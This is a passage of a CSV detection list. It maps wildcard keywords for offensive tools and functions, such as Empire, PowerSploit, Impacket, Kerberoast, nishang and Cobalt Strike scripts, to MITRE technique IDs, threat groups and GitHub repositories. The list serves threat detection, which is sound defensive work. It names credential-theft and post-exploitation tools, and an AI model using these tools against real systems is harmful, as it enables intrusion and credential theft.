-*gettgtpkinit.py -cert-pfx *,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z
-*gettgtpkinit.py -cert-pfx*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gettgtpkinit.py -pfx-base64 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*gettgtpkinit.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z
-*Get-TimedScreenshot*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Get-UnattendSensitiveData*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Get-UnquotedService*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Get-USBKeystrokes*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1152,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Get-UserBadPwdCount*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-SMBAutoBrute.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-UserPrivileges*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-UserPRTToken*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). 
It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*GetUserSPNs.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*GetUserSPNs.vbs*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*Get-VaultCredential*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-VaultCredential*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-VaultCredential.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-VaultCreds*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-VolumeShadowCopy*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-WebCredentials*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*GetWebDAVStatus.csproj*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWebDAVStatus.sln*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient 
Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWebDAVStatus_DotNet*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWebDAVStatus_x64.o*,offensive_tool_keyword,cobaltstrike,Determine if the WebClient Service (WebDAV) is running on a remote system,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/G0ldenGunSec/GetWebDAVStatus,1,1,N/A,10,10,81,18,2021-09-29T17:40:52Z,2021-09-29T17:31:21Z -*GetWhoamiCommand*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*GetWhoamiCommand.cs*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*GetWindowsCredentials.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Get-Wlan-Keys*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Get-WLAN-Keys*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Get-WLAN-Keys.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*getwmiregcachedrdpconnection*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegCachedRDPConnection*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegCachedRDPConnection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-wmiregcachedrdpconnection*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*getwmireglastloggedon*,offensive_tool_keyword,cobaltstrike,Cobalt Strike 
Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Get-WMIRegLastLoggedOn*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 